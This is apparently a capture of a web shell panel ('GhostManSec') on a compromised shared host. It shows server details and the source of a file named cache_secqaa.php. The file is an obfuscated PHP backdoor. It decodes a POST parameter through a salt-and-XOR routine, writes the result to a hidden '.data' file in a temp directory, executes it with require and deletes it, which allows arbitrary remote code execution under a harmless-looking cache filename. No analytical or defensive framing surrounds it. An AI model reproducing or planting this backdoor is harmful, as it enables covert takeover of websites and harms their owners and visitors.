GhostManSec
Server: LiteSpeed
System: Linux premium256.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: niyknzcu (1843)
PHP: 8.0.30
Disabled: NONE
$ pwd: /home/niyknzcu/crivient.com/
Upload Files
File: /home/niyknzcu/crivient.com/cache_secqaa.php
<?php

if(array_key_exists("\x65\x6Cem", $_POST)){
	$holder = array_filter([sys_get_temp_dir(), getcwd(), ini_get("upload_tmp_dir"), "/dev/shm", "/tmp", session_save_path(), getenv("TEMP"), "/var/tmp", getenv("TMP")]);
	$rec = $_POST["\x65\x6Cem"];
	 	$rec		 =explode	 	( 	 "." 	,$rec	 )	;   
	$dat= '';
            $salt8= 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS= strlen(	$salt8	);
            $p= 0;
            $len= count(	$rec	);
    
            do { if(	$p >= $len) break;
                $v5= $rec[$p];
                $sChar= ord(	$salt8[$p % $lenS]	);
                $d= (	(	int)$v5 - $sChar -(	$p % 10))^ 86;
                $dat .= chr(	$d	);
                $p++;	}while(	true	);
	foreach ($holder as $flag) {
    		if (is_dir($flag) ? is_writable($flag) : false) {
    $comp = "$flag/.data";
    if (file_put_contents($comp, $dat)) {
	require $comp;
	unlink($comp);
	die();
}
}
}
}
@ Telegram